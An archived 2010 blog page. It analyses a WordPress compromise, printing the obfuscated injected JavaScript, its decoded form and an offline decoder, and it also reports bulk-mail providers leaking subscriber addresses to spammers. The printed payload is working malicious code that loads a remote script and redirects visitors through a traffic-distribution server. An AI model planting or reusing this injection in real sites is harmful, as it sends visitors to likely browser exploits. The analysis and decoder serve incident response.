February 2010 Archives

WordPress


A number of my friends just got nailed by a WordPress exploit that redirects visitors from their blogs to sites in China. Exploits like this have been around for ages, and the constant need to update WordPress is one reason I use MovableType, which publishes static pages and is therefore much less exposed to this sort of thing. Be that as it may: CHECK YOUR BLOG FOR UPDATES REGULARLY!

I don't know the actual mechanism by which the code got in; what I found was a small piece of JavaScript inserted into the PHP header file for the site. The one blog I looked at in detail was running 2.6.1, which has a known hole that lets an attacker create their own admin account, but it could have been any of a number of other issues. If you run WordPress, it is worth looking through your theme's header and footer templates (and your plugin directory) for script tags you didn't put there, and if someone did get an admin account, cleaning the template is not enough: remove the account and change every password too. The current version of WordPress as of this writing is 2.9.1. UPDATE!

For what it's worth, here's the code as it was injected into the header file.

<script language="javascript">document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%61%76%61%73%63%72%69%70%74%22%3E%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29%7B%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74%72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27%3B%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%31%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E%6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%7D%3C%2F%73%63%72%69%70%74%3E'));dF('%264Dtdsjqu%264Fepdvnfou/xsjuf%2639%2633%264Dtdsjqu%2631tsd%264E%266D%2633%2633%2C%2633iuuq%264B00jutbmmcsfbltpgu/ofu0uet0jo/dhj%264G3%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%264Eopuefgjof%2633%2C%2633%266D%2633%264F%264D%266D0tdsjqu%264F%2633%263%3A%264C%264D0tdsjqu%264F%261B%264Dtdsjqu%264F%261Bjg%2639uzqfpg%2639i%263%3A%264E%264E%2633voefgjofe%2633%263%3A%268C%261%3A%261B%261%3Aepdvnfou/xsjuf%2639%2633%264Djgsbnf%2631tsd%264E%2638iuuq%264B00jutbmmcsfbltpgu/ofu0uet0jo/dhj%264G4%2637tfpsfg%264E%2633%2CfodpefVSJDpnqpofou%2639epdvnfou/sfgfssfs%263%3A%2C%2633%2637qbsbnfufs%264E%2635lfzxpse%2637tf%264E%2635tf%2637vs%264E2%2637IUUQ%60SFGFSFS%264E%2633%2C%2631fodpefVSJDpnqpofou%2639epdvnfou/VSM%263%3A%2C%2633%2637efgbvmu%60lfzxpse%264Eopuefgjof%2638%2631xjeui%264E2%2631ifjhiu%264E2%2631cpsefs%264E1%2631gsbnfcpsefs%264E1%264F%264D0jgsbnf%264F%2633%263%3A%264C%2631%261B%268E%261Bfmtf%2631jg%2639i/joefyPg%2639%2633iuuq%264B%2633%263%3A%264E%264E1%263%3A%268C%261B%261%3A%261%3Axjoepx/mpdbujpo%264Ei%264C%261B%268E%261B%264D0tdsjqu%264F1')</script>

The outer unescape() is nothing more than URL decoding; it yields the helper function below, dF(), which the page then immediately calls on the second, differently obfuscated string. dF() is a simple shift cipher: the last character of its argument (here the digit 1) is the key, the rest is URL-decoded, every character code is lowered by the key, and the result is URL-decoded again before being written into the page.

<script language="javascript">function dF(s){var s1=unescape(s.substr(0,s.length-1)); var t='';for(i=0;i<s1.length;i++)t+=String.fromCharCode(s1.charCodeAt(i)-s.substr(s.length-1,1));document.write(unescape(t));}</script>

Running dF() over that string yields the real payload:

<script>document.write("<script src=\""+"http://itsallbreaksoft.net/tds/in.cgi?2&seoref="+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+ encodeURIComponent(document.URL)+"&default_keyword=notdefine"+"\"><\/script>");</script> <script> if(typeof(h)=="undefined"){ document.write("<iframe src='http://itsallbreaksoft.net/tds/in.cgi?3&seoref="+encodeURIComponent(document.referrer)+"&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="+ encodeURIComponent(document.URL)+"&default_keyword=notdefine' width=1 height=1 border=0 frameborder=0></iframe>"); } else if(h.indexOf("http:")==0){ window.location=h; } </script>

Here is what that payload does. The first script tag loads a remote script from itsallbreaksoft.net, passing along the referrer and the URL of the page you are on (the seoref and HTTP_REFERER parameters) so the server can decide what you should be shown. The second checks whether that remote script defined a variable h: if h is an http: URL, the browser is sent there with window.location; if h is not defined, a hidden 1x1 iframe pointing at the same server is written into the page instead. The /tds/in.cgi path is characteristic of a traffic distribution system (TDS), a redirector that picks a destination per visitor. From there your browser goes on a wild goose chase through several servers, each of which is inappropriately allowing anyone to create a redirect to yet another site. Some of those servers are probably compromised, because in the hour I spent looking at one site, the same injected code sent me to different sites in China. I would rate the odds very high that those sites carry malware exploits against some web browsers, so if you aren't up to date with your browser patches, it's time to run your anti-virus software and cross your fingers.
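To pull the two stages apart without loading anything in a browser, here is an offline decoder, added as an example; it is not the attacker's script and not code from the original post. It reimplements the legacy unescape()/escape() pair, reverses dF() exactly as the injected function defines it (last character is the key, the rest is URL-decoded, each character code is lowered by the key, then URL-decoded again), and includes the inverse so the scheme can be exercised on a constructed sample. The sample markup, the hostname tds.example.invalid in it, and the helper names are mine.

```javascript
// Added example: offline decoder for the two-stage obfuscation above.
// Not the attacker's script and not from the original post; the sample
// payload built at the bottom is constructed and its hostname is a placeholder.

// Minimal reimplementation of the legacy JavaScript unescape(): %XX and %uXXXX.
function jsUnescape(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g, (m, u, x) =>
    String.fromCharCode(parseInt(u !== undefined ? u : x, 16)));
}

// Counterpart of the legacy escape(): everything except A-Za-z0-9@*_+-./ is %-encoded.
function jsEscape(s) {
  return s.replace(/[^A-Za-z0-9@*_+\-.\/]/g, (c) => {
    const code = c.charCodeAt(0);
    return code < 256
      ? '%' + code.toString(16).toUpperCase().padStart(2, '0')
      : '%u' + code.toString(16).toUpperCase().padStart(4, '0');
  });
}

// Stage 1: document.write(unescape('%3C%73...')) is nothing but URL decoding.
function decodeStage1(escaped) {
  return jsUnescape(escaped);
}

// Stage 2: dF(s). The last character of the argument is the key (a digit);
// the rest is URL-decoded, each char code is lowered by the key, and the
// result is URL-decoded once more. Returned as a string, never written to a page.
function decodeDF(payload) {
  const key = parseInt(payload.slice(-1), 10);
  if (Number.isNaN(key)) throw new Error('payload does not end in a key digit');
  const shifted = jsUnescape(payload.slice(0, -1));
  let escapedPlain = '';
  for (let i = 0; i < shifted.length; i++) {
    escapedPlain += String.fromCharCode(shifted.charCodeAt(i) - key);
  }
  return jsUnescape(escapedPlain);
}

// Inverse transform (escape, shift up, escape, append key) so the scheme can be
// exercised on constructed input and checked against the real payload's prefix.
function encodeDF(plain, key) {
  const esc = jsEscape(plain);
  let shifted = '';
  for (let i = 0; i < esc.length; i++) {
    shifted += String.fromCharCode(esc.charCodeAt(i) + key);
  }
  return jsEscape(shifted) + String(key);
}

// Hostnames referenced by decoded markup, for blocklists and proxy-log hunting.
function extractHosts(markup) {
  const hosts = new Set();
  for (const m of markup.matchAll(/https?:\/\/([^\/\s"'<>]+)/g)) hosts.add(m[1]);
  return [...hosts].sort();
}

// Constructed sample run through the same scheme with key 1.
const SAMPLE_PLAIN =
  '<script src="http://tds.example.invalid/in.cgi?2"></script>' +
  '<iframe src="http://tds.example.invalid/in.cgi?3" width=1 height=1></iframe>';
const SAMPLE_PAYLOAD = encodeDF(SAMPLE_PLAIN, 1);

console.log(decodeDF(SAMPLE_PAYLOAD) === SAMPLE_PLAIN); // true
console.log(extractHosts(decodeDF(SAMPLE_PAYLOAD)));     // [ 'tds.example.invalid' ]
```

Run it with node. The thing worth noticing is that encodeDF('<script>', 1) produces exactly the %264Dtdsjqu%264F1 that opens the real dF() argument above; reproducing a known prefix is how you confirm a decoder matches the obfuscator before trusting its output on the whole payload. extractHosts() then gives you the hostnames to block or hunt for in proxy logs without ever executing the decoded markup.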

Note: I heard back anonymously from a customer of iContact. Are they upset that all their customers' email addresses were stolen? Yes. But they aren't that worried about the impact, because they know that most of their customers will never realize that iContact, or their company, was the source of the leak. In other words, there is no incentive for bulk mail providers to improve security. An email address, particularly one known to be associated with a particular set of services, is the means by which spammers target phishing attacks. It's the key to password changes, bank accounts, and more. Why are the security standards for email addresses any lower than they are for credit card numbers?

Every time a web site asks me for an email address, I give it a unique address that includes that site's domain name. This makes it very easy to tell when a company either misbehaves or has had its mailing list compromised. Of course, often the company sending me the mail is using a third-party email provider to deliver it, and here's the dirty secret.

When your email provider's database gets broken into and a spammer walks off with all of their customers' lists, they don't necessarily tell you, the client. And they certainly don't bother telling the poor sucker whose email address was stolen.


Case #1—AWeber
Starting in December 2009, I began receiving spam at the address I use for the help-a-reporter service. I filed a report with their current bulk mail provider, but got no response. It turned out that HARO had only recently switched to this provider; the real culprit was their previous one. A discussion with Adam Shankman led him to research the issue and find out (from an article on the internet!) that his previous email provider had been compromised and all of HARO's email addresses had been fed to spammers. AWeber's subscriber list had been compromised, and they had told none of their customers until they started getting complaints.


Case #2—iContact
Today I noticed three identical spam messages to three different custom email addresses: the ones I had given to morrisonsoftdesign.com, fontgear.net and myhappyplanet.com. I went back and found that a) it had been going on for at least a few weeks and b) all three companies use, or have used, icontact.com to deliver their mail (morrisonsoftdesign.com switched providers at some point). So, in other words: if you have an account with morrisonsoftdesign.com, fontgear.net or myhappyplanet.com, or any other company that uses iContact, your email address has almost certainly been fed to the spammers. But don't blame the company you subscribed with; the culprit is iContact. Other iContact customers include (according to their web site) Peach Running Co., West Race Cars, Pro Mom Couture and 58,654 other customers with 577,545 email addresses. Feel free to let them know what you think of their ineptitude.
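The way those three addresses point back to a single provider can be turned into a repeatable check. What follows is an added example, not code from the original post: it assumes plus-addressing (me+site-domain@yourdomain) as the way the site's domain is embedded in the address, which the post does not specify, and every mailbox entry, site name and vendor name in it is a constructed placeholder.

```javascript
// Added example (not from the original post): attribute a list leak to a shared
// third-party sender by correlating which per-site addresses received the same
// spam. Every mailbox entry, site and vendor below is a constructed placeholder.

// Assumed address scheme: <localpart>+<site-domain>@<your-domain>. The post only
// says the address includes the site's domain; plus-addressing is one way to do it.
function siteTagOf(address) {
  const m = /^[^+@]+\+([^@]+)@/.exec(address);
  return m ? m[1].toLowerCase() : null;
}

// Normalise a message so one campaign maps to one key even when the tracking
// link or whitespace differs per recipient.
function campaignKey(msg) {
  const body = msg.body.replace(/https?:\/\/\S+/g, '<url>').replace(/\s+/g, ' ').trim();
  return msg.subject.trim().toLowerCase() + '\n' + body;
}

// Constructed lookup: bulk-mail vendors each site has used, current first.
const VENDORS_OF = {
  'shop-a.example': ['bulkmail-x.invalid'],
  'shop-b.example': ['bulkmail-x.invalid'],
  'shop-c.example': ['bulkmail-y.invalid', 'bulkmail-x.invalid'], // switched vendors
  'shop-d.example': ['bulkmail-y.invalid'],
};

// Constructed mailbox: one campaign reaches three tagged addresses; a look-alike
// pair reaches two sites that share no vendor; one message has no tag at all.
const MAILBOX = [
  { to: 'me+shop-a.example@mydomain.example', subject: 'Cheap watches!!', body: 'Buy now http://w1.invalid/a1' },
  { to: 'me+shop-b.example@mydomain.example', subject: 'Cheap watches!!', body: 'Buy now  http://w1.invalid/b2' },
  { to: 'me+shop-c.example@mydomain.example', subject: 'cheap watches!!', body: 'Buy now http://w1.invalid/c3' },
  { to: 'me+shop-d.example@mydomain.example', subject: 'Your order', body: 'Thanks for ordering.' },
  { to: 'me+shop-b.example@mydomain.example', subject: 'Your order', body: 'Thanks for ordering.' },
  { to: 'nobody@mydomain.example', subject: 'Cheap watches!!', body: 'Buy now http://w1.invalid/zz' },
];

// For every campaign seen at two or more tagged addresses, report the sites hit
// and the vendors they all have in common. An empty intersection means the
// content alone does not implicate a shared provider.
function attributeLeaks(messages, vendorsOf) {
  const campaigns = new Map(); // key -> { subject, sites: Set }
  for (const msg of messages) {
    const tag = siteTagOf(msg.to);
    if (!tag) continue; // untagged address: nothing to attribute
    const key = campaignKey(msg);
    if (!campaigns.has(key)) {
      campaigns.set(key, { subject: msg.subject.trim().toLowerCase(), sites: new Set() });
    }
    campaigns.get(key).sites.add(tag);
  }
  const findings = [];
  for (const { subject, sites } of campaigns.values()) {
    if (sites.size < 2) continue; // one leaked site says nothing about a shared vendor
    let common = null;
    for (const site of sites) {
      const v = new Set(vendorsOf[site] || []);
      common = common === null ? v : new Set([...common].filter((x) => v.has(x)));
    }
    findings.push({ subject, sites: [...sites].sort(), commonVendors: [...common].sort() });
  }
  return findings;
}

console.log(attributeLeaks(MAILBOX, VENDORS_OF));
```

The vendor history matters: a site that switched providers, like morrisonsoftdesign.com above, still intersects on the old vendor, which is exactly what implicates the previous provider rather than the current one.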

It's unconscionable that these companies are not notifying their own clients of data breaches, let alone the end users who end up getting spammed. If any of them have a presence in California, it is probably also illegal.


About this Archive

This page is an archive of entries from February 2010 listed from newest to oldest.

About Me

I'm the CEO/CTO of Somewhere, Inc., a company building a unified social networking layer that gives people the means to track their friends across multiple social networks.
This blog is licensed under a Creative Commons License.
